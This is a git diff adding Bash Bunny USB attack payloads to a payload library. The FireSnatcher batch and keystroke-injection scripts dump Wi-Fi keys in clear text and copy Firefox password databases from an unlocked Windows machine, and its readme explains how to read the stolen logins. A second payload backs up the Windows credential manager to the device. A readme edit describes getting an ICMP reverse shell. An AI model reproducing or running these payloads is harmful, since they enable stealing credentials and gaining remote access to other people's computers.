diff --git a/payloads/library/credentials/FireSnatcher/FireSnatcher.bat b/payloads/library/credentials/FireSnatcher/FireSnatcher.bat new file mode 100644 index 00000000..d08c8229 --- /dev/null +++ b/payloads/library/credentials/FireSnatcher/FireSnatcher.bat @@ -0,0 +1,6 @@ +mkdir %~dp0\loot\%COMPUTERNAME% +cd /D %~dp0\loot\%COMPUTERNAME% && netsh wlan export profile key=clear +C: cd \D %appdata%\mozilla\firefox\profiles\ +cd %appdata%\mozilla\firefox\profiles\*.default-release\ +copy key4.db %~dp0\loot\%COMPUTERNAME% +copy logins.json %~dp0\loot\%COMPUTERNAME% \ No newline at end of file diff --git a/payloads/library/credentials/FireSnatcher/README.md b/payloads/library/credentials/FireSnatcher/README.md new file mode 100644 index 00000000..1d3b0dd0 --- /dev/null +++ b/payloads/library/credentials/FireSnatcher/README.md @@ -0,0 +1,45 @@ +# Title: FireSnatcher +# Description: Copies Wifi Keys, and Firefox Password Databases +# Author: KarrotKak3 +# Props: saintcrossbow & 0iphor13 +# Version: 1.0.2.0 (Work in Progress) +# Category: Credentials +# Target: Windows (Logged in) +# Attackmodes: HID, Storage + +# Full Description +# ---------------- +# Attacks an Unlocked Windows Machine +# Payload targets: +# - All WiFi creds +# - Firefox Saved Password Database +# +# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC +# Delays to Allow Powershell Time to Open and to Give Attack time to Run + +# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT +# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE +# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins + + +# KNOWN ISSUES +# --------------- +# Loot is saved in Payloads/switch#/loot + + +# Files +# ----- +# - payload.txt: Starts the attack. All configuration contained in this file. +# - FireSnatcher.bat: Worker that grabs Creds + + +# Setup +# ----- +# - Place the payload.txt and FireSnatcher.bat in Payload folder +# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running) +# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility + +**LED meanings** +- Magenta: Initial setup – about 1 – 3 seconds +- Single yellow blink: Attack in progress +- Green rapid flash, then solid, then off: Attack complete diff --git a/payloads/library/credentials/FireSnatcher/payload.txt b/payloads/library/credentials/FireSnatcher/payload.txt new file mode 100644 index 00000000..143efd55 --- /dev/null +++ b/payloads/library/credentials/FireSnatcher/payload.txt @@ -0,0 +1,78 @@ +# Title: FireSnatcher +# Description: Copies Wifi Keys, and Firefox Password Databases +# Author: KarrotKak3 +# Props: saintcrossbow & 0iphor13 +# Version: 1.0.2.0 (Work in Progress) +# Category: Credentials +# Target: Windows (Logged in) +# Attackmodes: HID, Storage + +# Full Description +# ---------------- +# Attacks an Unlocked Windows Machine +# Payload targets: +# - All WiFi creds +# - Firefox Saved Password Database +# +# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC +# Delays to Allow Powershell Time to Open and to Give Attack time to Run + +# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT +# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE +# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins + + +# KNOWN ISSUES +# --------------- +# Loot is saved in Payloads/switch#/loot + + +# Files +# ----- +# - payload.txt: Starts the attack. All configuration contained in this file. +# - FireSnatcher.bat: Worker that grabs Creds + + +# Setup +# ----- +# - Place the payload.txt and FireSnatcher.bat in Payload folder +# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running) +# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility + +# LEDs +# ---- +# Magenta: Initial setup – about 1 – 3 seconds +# Single yellow blink: Attack in progress +# Green rapid flash, then solid, then off: Attack complete – Bash Bunny may be removed + +# Options +# ------- +# Name of Bash Bunny volume that appears to Windows (BashBunny is default) +BB_NAME="BashBunny" + +# Setup +# ----- +LED SETUP + + +# Attack +# ------ +ATTACKMODE HID STORAGE +Q DELAY 500 +LED ATTACK +Q DELAY 100 +Q GUI r +Q DELAY 100 +Q STRING powershell Start-Process powershell +Q ENTER +Q DELAY 7000 +Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\FireSnatcher.bat')" +Q ENTER +Q DELAY 8000 +Q STRING EXIT +Q ENTER +sync +LED FINISH +Q DELAY 1500 +shutdown now + diff --git a/payloads/library/exfiltration/Win_HID_BackupKeyManager/payload.txt b/payloads/library/exfiltration/Win_HID_BackupKeyManager/payload.txt new file mode 100644 index 00000000..48b0284a --- /dev/null +++ b/payloads/library/exfiltration/Win_HID_BackupKeyManager/payload.txt @@ -0,0 +1,66 @@ +#!/bin/bash +# Title: KeyManager Backup +# Description: Create a backup of the key manager which stores log-on credentials for servers, websites and programs +# Author: Cribbit +# Version: 1.0 +# Category: Exfiltration +# Target on: Windows 10 +# Attackmodes: HID & STORAGE +# Extensions: Run +# Props: Paranoid Ninja + +####################### Config ####################### +password=lamepassword +##################### End Config ##################### + +LED SETUP + +ATTACKMODE HID STORAGE + +LED ATTACK + +QUACK DELAY 200 +RUN WIN "rundll32 keymgr.dll, KRShowKeyMgr" +QUACK DELAY 200 +# button: Backup up... +QUACK ALT b +QUACK DELAY 200 +# button: Browse... +QUACK ALT b +# file name +QUACK STRING "backup" +# select task bar +QUACK ALT d +QUACK DELAY 200 +# look for bunny +QUACK STRING "BashBunny" +QUACK DELAY 600 +#select drive +QUACK DOWNARROW +# add loot folder +QUACK STRING "/loot" +QUACK ENTER +QUACK DELAY 200 +# button: Save +QUACK ALT s +QUACK DELAY 200 +# button: Next +QUACK ALT n +QUACK DELAY 200 +# note: keycroc you can uses CTRL-ALT-DELETE +QUACK CTRL-ALT DELETE +QUACK DELAY 200 +QUACK STRING "$password" +QUACK TAB +QUACK STRING "$password" +# button: Next +QUACK ALT n +QUACK DELAY 300 +# button: Finish +QUACK ALT f +QUACK DELAY 200 +# button: Close +QUACK ALT c + +LED FINISH + diff --git a/payloads/library/exfiltration/Win_HID_BackupKeyManager/readme.md b/payloads/library/exfiltration/Win_HID_BackupKeyManager/readme.md new file mode 100644 index 00000000..89c5fdbd --- /dev/null +++ b/payloads/library/exfiltration/Win_HID_BackupKeyManager/readme.md @@ -0,0 +1,30 @@ +# KeyManager Backup +- Author: Cribbit +- Version: 1.0 +- Tested on: Windows 10 +- Category: Exfiltration +- Attackmode: HID & STORAGE +- Extensions: Run +- Props: Paranoid Ninja https://twitter.com/NinjaParanoid/status/1516442028963659777 + +## Description +Create a backup of the key manager which stores log-on credentials for servers, websites and programs. + +## Change Log +| Version | Changes | +| ------- | --------------- | +| 1.0 | Initial release | + +## Config +set the password for the backup by setting the `password` variable + +## Notes +This payload relays heavily on button shortcuts this mean it is very target to an English version of windows. +If you are targeting a different language, you will need to change the letter after the ALT key to the corresponding letter for the button. + +## Colours +| Status | Colour | Description | +| -------- | ----------------------------- | --------------------------- | +| SETUP | Magenta solid | Setting attack mode | +| ATTACK | Yellow single blink | Injecting script | +| FINISHED | Green blink followed by SOLID | Injection finished | \ No newline at end of file diff --git a/payloads/library/remote_access/PingZhellBunny/README.md b/payloads/library/remote_access/PingZhellBunny/README.md index fe1bcb23..ac8ccd9f 100644 --- a/payloads/library/remote_access/PingZhellBunny/README.md +++ b/payloads/library/remote_access/PingZhellBunny/README.md @@ -24,18 +24,18 @@ Install dependencies, if needed: - NetPacket::ICMP Disable ICMP replies by the OS: - *sysctl -w net.ipv4.icmp_echo_ignore_all=1* + `sysctl -w net.ipv4.icmp_echo_ignore_all=1` Start Bunny.pl -> perl Bunny.pl # !!!Insert the IP of your attacking machine into PingZhell.ps1!!! # -Plug in Bashbunny with PingZhellBunny equipped. -Achieve reverse shell. -run away <3 +
Plug in Bashbunny with PingZhellBunny equipped.
+Achieve reverse shell.
+ run away <3